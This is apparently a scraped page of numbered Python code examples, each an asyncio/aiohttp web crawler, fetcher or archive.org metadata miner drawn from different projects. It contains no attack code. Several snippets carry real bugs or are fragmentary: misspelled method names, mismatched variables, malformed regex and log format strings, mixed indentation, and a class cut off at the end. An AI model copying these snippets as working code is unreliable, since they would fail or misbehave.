class WebCrawler(object):
    def __init__(self, url, max_requests, loop, max_coroutines=100):
        self.url = url
        self.max_requests = max_requests
        self.links_visited = set()
        self.max_coroutines = max_coroutines
        self.queue = Queue()
        self.loop = loop

    @asyncio.coroutine
    def work(self):
        while True:
            url = yield from self.queue.get()
            fetcher = Fetcher(url, self)
            yield from fetcher.connect()
            self.queue.task_done()

    @asyncio.coroutine
    def web_crawler(self):
        self.queue.put_nowait(self.url)
        self.session = aiohttp.ClientSession(loop=self.loop)
        workers = [
            asyncio.Task(self.work()) for _ in range(self.max_coroutines)
        ]
        yield from self.queue.join()
        for worker in workers:
            worker.cancel()
        yield from self.session.close()
예제 #2
0
class Fetcher:
    def __init__(self, loop):
        self.num_worker = 10
        self.loop = loop
        self.q = Queue()
        self.seen_urls = set(['/'])

    @asyncio.coroutine
    def manager(self):
        workers = [
            self.loop.create_task(self.worker())
            for _ in range(self.num_worker)
        ]
        yield from self.q.put('/')
        # wait until q is empty
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def worker(self):
        while True:
            url = yield from self.q.get()

            sock = socket.socket(socket.AF_INET)
            sock.setblocking(False)
            try:
                yield from self.loop.sock_connect(sock, ('dilbert.com', 80))
            except BlockingIOError:
                pass

            request = 'GET {} HTTP/1.1\r\nHost: dilbert.com\r\nConnection: close\r\n\r\n'.format(
                url)
            yield from self.loop.sock_sendall(sock, request.encode('ascii'))

            response = b''
            chunk = yield from self.loop.sock_recv(sock, 4096)
            while chunk:
                response += chunk
                chunk = yield from self.loop.sock_recv(sock, 4096)

            links = yield from self.parse_link(response)
            for link in links.difference(self.seen_urls):
                yield from self.q.put(link)

            self.seen_urls.update(links)
            self.q.task_done()
            sock.close()

    @asyncio.coroutine
    def parse_link(self, response):
        links = set([])
        d = pq(response)
        anchors = d("a")
        for anchor in anchors:
            href = anchor.get("href")
            if href and href[:5] == "http:" and href[7:14] == "dilbert":
                links.add(href[6:])
        return links
예제 #3
0
class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        self.session = aiohttp.ClientSession(loop=loop)

        # Put (URL, max_redirect) in the queue.
        self.q.put((root_url, self.max_redirect))
		
	@asyncio.coroutine
    def crawl(self):
        """Run the crawler until all work is done."""
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks)]

        # When all work is done, exit.
        yield from self.q.join()
        for w in workers:
            w.cancel()
	@asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()

            # Download page and add new links to self.q.
            yield from self.fetch(url, max_redirect)
            self.q.task_done()
	
	
# Begin fetching http://xkcd.com/353/
fetcher = Fetcher('/353/')
Task(fetcher.fetch())

loop = asyncio.get_event_loop()

crawler = crawling.Crawler('http://xkcd.com',
                           max_redirect=10)

loop.run_until_complete(crawler.crawl())
		
		
		
		
		
		
		
		
		
		
예제 #4
0
파일: test.py 프로젝트: romandev/bible
class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        self.session = aiohttp.ClientSession(loop=loop)

        self.q.put((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        workers = [asyncio.Task(self.work()) for _ in range(self.max_tasks)]
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_direct = yield from self.q.get()
            yield from self.fetch(url, max_redirect)
            self.q.task_done(
            )  # 多线程:https://segmentfault.com/q/1010000009765115

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        response = yield from self.session.get(url, allow_redirects=False)

        try:
            if is_redirect(response):
                if max_redirect > 0:
                    next_url = response.headers['location']
                    if next_url in self.seen_urls:
                        return
                    self.seen_urls.add(next_url)
                    self.q.put_nowait((next_url, max_redirect - 1))
            else:
                links = yield from self.parse_links(response)
                for link in links.differenct(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()
예제 #5
0
def worker(get, queue: asyncio.JoinableQueue, output):
    while True:
        item = yield from queue.get()
        # This is horrible and I feel bad for writing it, believe me
        try:
            if item is None:
                return

            chunks, id = item

            for i in range(id, id + chunks):
                try:
                    data = yield from get("item/{}".format(i))
                    output(data)
                except Exception:
                    pass
        except Exception as e:
            pass
        finally:
            queue.task_done()
예제 #6
0
class Spider:
    def __init__(self, max_tries=30, max_tasks=10, timeout=5,
                 rootDir=os.getcwd()):
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.loop = asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.timeout = timeout
        self.rootDir = rootDir

    def close(self):
        self.session.close()


    def append_request(self, request):
        self.q.put_nowait(request)


    @asyncio.coroutine
    def _get_request(self):
        r = yield from self.q.get()
        return r

    @asyncio.coroutine
    def fetch(self, request_type, url, params, data):
        """Fetch one URL"""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                print("try %s---->%d times"%(url, tries))
                with aiohttp.Timeout(self.timeout):
                    response = yield from self.session.get(url, params=params)
                    if response.status == 200:
                        content_type = response.headers.get('content-type')
                        if content_type in CONTENT_TYPE_TEXT:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.text(encoding='GBK')
                        else:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.read()
                    break;
            except asyncio.TimeoutError:
                print("timeout")
            except aiohttp.ClientError as client_error:
                print("client error")
            except Exception:
                print("unknown error")
            tries += 1
        else:
            print("try %s---->more than %d times, quit"%(url, tries))
            return None

        response.release()
        return content

    @asyncio.coroutine
    def _work(self):
        """Process queue items forever."""
        try:
            while True:
                r = yield from self._get_request()
                content = yield from self.fetch(r.request_type, r.url, r.params, r.data)
                if(content):
                    r.handle_func(content)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def work(self):
        yield from self._work()

    @asyncio.coroutine
    def spider(self):
        """run  the spider until all finished"""
        workers = [asyncio.Task(self.work(),loop=self.loop)
                   for _ in range (self.max_tasks)]
        yield from self.q.join()

        for w in workers:
             w.cancel()
예제 #7
0
class Crawler:
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        self.session.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        # Process queue items forever.
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        # Add a URL to the queue if not seen before.
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        # Run the crawler until all finished.
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
예제 #8
0
class Crawler:
    def __init__(self, roots, exclude=None, strict=True, max_redirect=10, max_tries=4, max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z]', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        self.session.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                urls = set(re.findall(r"""(?i)href=["']?([^\s"'<>]+)""", text))
                if urls:
                    logger.info('got %r distinct urls from %r', len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stats = FetchStatistic(url=response.url, next_url=None, status=response.status, exception=None, size=len(body),
                               content_type=content_type, encoding=encoding, num_urls=len(links),
                               num_new_urls=len(links - self.seen_urls))
        return stats, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url, allow_redirects=False)
                if tries > 1:
                    logger.info('try %r for % success', tries, url)
                break
            except aiohttp.ClientError as client_error:
                logger.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1

        else:
            logger.error('%r failed after %r tries', url, self.max_tries)

            self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0,
                                                 content_type=None, encoding=None, num_urls=0, num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(
                    FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0,
                                   content_type=None, encoding=None, num_urls=0, num_new_urls=0))
                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    logger.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    logger.error('redirect limit reached for &r from %r', next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            pass

    @asyncio.coroutine
    def work(self):
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            logger.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            logger.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        if max_redirect is None:
            max_redirect = self.max_redirect
        logger.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    def crawl(self):
        workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
예제 #9
0
파일: __init__.py 프로젝트: MVilstrup/swarm
class Fetcher(object):
    """
    Async Page fetcher, that c 

    """

    def __init__(self, max_tasks=20):
        self.max_tasks = max_tasks
        self.max_redirect = max_redirect
        self.q = Queue()

        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        loop = asyncio.get_event_loop()
        loop.run_until_complete(self.fetch())
        self.session = aiohttp.ClientSession(loop=loop)


    @asyncio.coroutine
    def fetch(self):
        """
        Run the fetcher until all work is done.
        """
        # Create workers that fetch pages
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks / 2)]

        # Create seeders that takes URLs from redis and adds it to own queue
        seeders = [asyncio.Task(self.get_seeds())
                   for _ in range(self.max_tasks / 2)]

        # When all work is done, exit.
        yield from self.q.join()
        for s in seeders:
            s.cancel()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            # Get URLs from own queue
            url = yield from self.q.get()

            # Download page
            yield from self.fetch_url(url)
            self.q.task_done()

    @asyncio.coroutine
    def fetch_url(self, url):
        # Handle redirects ourselves.
        response = yield from self.session.get(
            url, allow_redirects=True)

        try:
            # Handle the reponse
            pass
        finally:
            # Return connection to pool.
            yield from response.release()


    @asyncio.coroutine
    def get_seeds(self):
        while True:
            pass
예제 #10
0
파일: crawling.py 프로젝트: wmz0001/crawler
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):   # The lone * indicates that all following arguments are keyword-only arguments
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):  # \A and \Z are similar to ^ and $, \d represents the digital.(0.0.0.0)
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
예제 #11
0
파일: core.py 프로젝트: pl77/iamine
class Miner(object):

    def __init__(self,
                 loop=None,
                 max_tasks=None,
                 retries=None,
                 secure=None,
                 hosts=None,
                 params=None,
                 config=None,
                 config_file=None,
                 access=None,
                 secret=None,
                 debug=None):

        # Set default values for kwargs.
        loop = asyncio.get_event_loop() if not loop else loop
        max_tasks = 100 if not max_tasks else max_tasks
        max_retries = 10 if not retries else retries
        protocol = 'http://' if not secure else 'https://'
        config = get_config(config, config_file)
        access = config.get('s3', {}).get('access', access)
        secret = config.get('s3', {}).get('secret', secret)
        debug = True if debug else False

        self.max_tasks = max_tasks
        self.max_retries = max_retries
        self.protocol = protocol
        self.hosts = hosts
        self.config = config
        self.access = access
        self.debug = debug
        self.cookies = config.get('cookies', {})

        # Asyncio/Aiohttp settings.
        self.connector = aiohttp.TCPConnector(share_cookies=True, loop=loop)
        self.connector.update_cookies(self.cookies)
        self.loop = loop
        self.q = Queue(1000, loop=self.loop)
        self.q = Queue(loop=self.loop)

        # Require valid access key!
        self.assert_s3_keys_valid(access, secret)

        # Rate limiting.
        self._max_per_second = self.get_global_rate_limit()
        self._min_interval = 1.0 / float(self._max_per_second)
        self._last_time_called = 0.0

    def close(self):
        self.connector.close()
        self.loop.stop()
        self.loop.close()

    def assert_s3_keys_valid(self, access, secret):
        url = '{}s3.us.archive.org?check_auth=1'.format(self.protocol)
        r = urllib.request.Request(url)
        r.add_header('Authorization', 'LOW {0}:{1}'.format(access, secret))
        f = urllib.request.urlopen(r)
        j = json.loads(f.read().decode('utf-8'))
        if j.get('authorized') is not True:
            raise AuthenticationError(j.get('error'))

    def get_global_rate_limit(self):
        """Get the global rate limit per client.

        :rtype: int
        :returns: The global rate limit for each client.
        """
        r = urllib.request.urlopen('https://archive.org/metadata/iamine-rate-limiter')
        j = json.loads(r.read().decode('utf-8'))
        return int(j.get('metadata', {}).get('rate_per_second', 300))

    def _rate_limited():
        """A rate limit decorator for limiting the number of times the
        decorated :class:`Miner` method can be called. Limits are set in
        :attr:`Miner._max_per_second`.
        """
        def decorate(func):
            def rate_limited_func(self, *args, **kwargs):
                elapsed = time.monotonic() - self._last_time_called
                self.left_to_wait = self._min_interval - elapsed
                if self.left_to_wait > 0:
                    time.sleep(self.left_to_wait)
                func(self, *args, **kwargs)
                self._last_time_called = time.monotonic()
                yield from func(self, *args, **kwargs)
            return rate_limited_func
        return decorate

    @_rate_limited()
    def make_rate_limited_request(self, request):
        yield from request.make_request()

    @asyncio.coroutine
    def work(self):
        while True:
            request = yield from self.q.get()
            yield from self.make_rate_limited_request(request)
            self.q.task_done()

    @asyncio.coroutine
    def q_requests(self, requests):
        for req in requests:
            self.q.put_nowait(req)

    @asyncio.coroutine
    def mine(self, requests):
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        yield from self.q_requests(requests)

        yield from self.q.join()
        yield from asyncio.sleep(1)
        while not self.q.empty():
            yield from asyncio.sleep(1)

        for w in workers:
            w.cancel()
        yield from asyncio.sleep(.5)
예제 #12
0
파일: core.py 프로젝트: pl77/iamine
class SearchMiner(ItemMiner):

    def __init__(self, **kwargs):
        super(SearchMiner, self).__init__(**kwargs)
        # Item mining queue.
        self.iq = Queue(1000, loop=self.loop)

    def get_search_params(self, query, params):
        default_rows = 500
        search_params = {
            'q': 'all:1',
            'page': 1,
            'output': 'json',
        }
        if params:
            search_params.update({k: v for k, v in params.items() if v})
        if query:
            search_params['q'] = query
        if 'rows' not in search_params:
            search_params['rows'] = default_rows
        return search_params

    def get_search_info(self, params):
        url = make_url('/advancedsearch.php?', self.protocol, self.hosts)
        p = deepcopy(params)
        p['rows'] = 0

        params = urllib.parse.urlencode(p)
        url += params
        f = urllib.request.urlopen(url)
        return json.loads(f.read().decode('utf-8'))

    @asyncio.coroutine
    def _handle_search_results(self, resp, params=None, callback=None):
        j = yield from resp.json(encoding='utf-8')
        resp.close()
        identifiers = []
        for doc in j.get('response', {}).get('docs', []):
            if not doc.get('identifier'):
                continue
            identifiers.append(doc['identifier'])
        for req in metadata_requests(identifiers, params, callback, self):
            self.iq.put_nowait(req)

    def search_requests(self, query=None, params=None, callback=None, mine_ids=None):
        """Mine Archive.org search results.

        :param query: The Archive.org search query to yield results for.
                      Refer to https://archive.org/advancedsearch.php#raw
                      for help formatting your query.
        :type query: str

        :param params: The URL parameters to send with each request sent
                       to the Archive.org Advancedsearch Api.
        :type params: dict
        """
        # If mining ids, devote half the workers to search and half to item mining.
        if mine_ids:
            self.max_tasks = self.max_tasks/2
        # When mining id's, the only field we need returned is "identifier".
        if mine_ids and params:
            params = dict((k, v) for k, v in params.items() if 'fl' not in k)
            params['fl[]'] = 'identifier'

        # Make sure "identifier" is always returned in search results.
        fields = [k for k in params if 'fl' in k]
        if (len(fields) == 1) and (not any('identifier' == params[k] for k in params)):
            # Make sure to not overwrite the existing fl[] key.
            i = 0
            while params.get('fl[{}]'.format(i)):
                i += 1
            params['fl[{}]'.format(i)] = 'identifier'

        search_params = self.get_search_params(query, params)
        url = make_url('/advancedsearch.php', self.protocol, self.hosts)

        search_info = self.get_search_info(search_params)
        total_results = search_info.get('response', {}).get('numFound', 0)
        total_pages = (int(total_results/search_params['rows']) + 1)

        for page in range(1, (total_pages + 1)):
            params = deepcopy(search_params)
            params['page'] = page
            if not callback and mine_ids:
                callback = self._handle_search_results
            req = MineRequest('GET', url, self.access,
                              callback=callback,
                              max_retries=self.max_retries,
                              debug=self.debug,
                              params=params,
                              connector=self.connector)
            yield req

    @asyncio.coroutine
    def mine_items(self):
        while True:
            request = yield from self.iq.get()
            yield from self.make_rate_limited_request(request)
            self.iq.task_done()

    @asyncio.coroutine
    def search(self, query=None, params=None, callback=None, mine_ids=None):
        search_requests = self.search_requests(query, params, callback, mine_ids)
        if mine_ids:
            workers = [asyncio.Task(self.mine_items(), loop=self.loop)
                       for _ in range(self.max_tasks)]

        yield from self.mine(search_requests)
        # Wait a bit for all connections to close.
        yield from asyncio.sleep(1)

        if mine_ids:
            for w in workers:
                w.cancel()
예제 #13
0
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, loop=None):

        get_domain(roots)

        if not os.path.exists(os.path.dirname(path)):
            os.makedirs(os.path.dirname(path))

        with open(path, 'w') as temp_file:
            print('writing')
            temp_file.write('Domain name:')
            temp_file.write(roots)
            temp_file.write('\n \n')
            temp_file.close()

        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.connector = aiohttp.TCPConnector(loop=self.loop)
        self.root_domains = set()
#        for root in roots:
#            parts = urllib.parse.urlparse(root)
#            host, port = urllib.parse.splitport(parts.netloc)
#            if not host:
#                continue
#            if re.match(r'\A[\d\.]*\Z', host):
#                self.root_domains.add(host)
#            else:
##                host = host.lower()
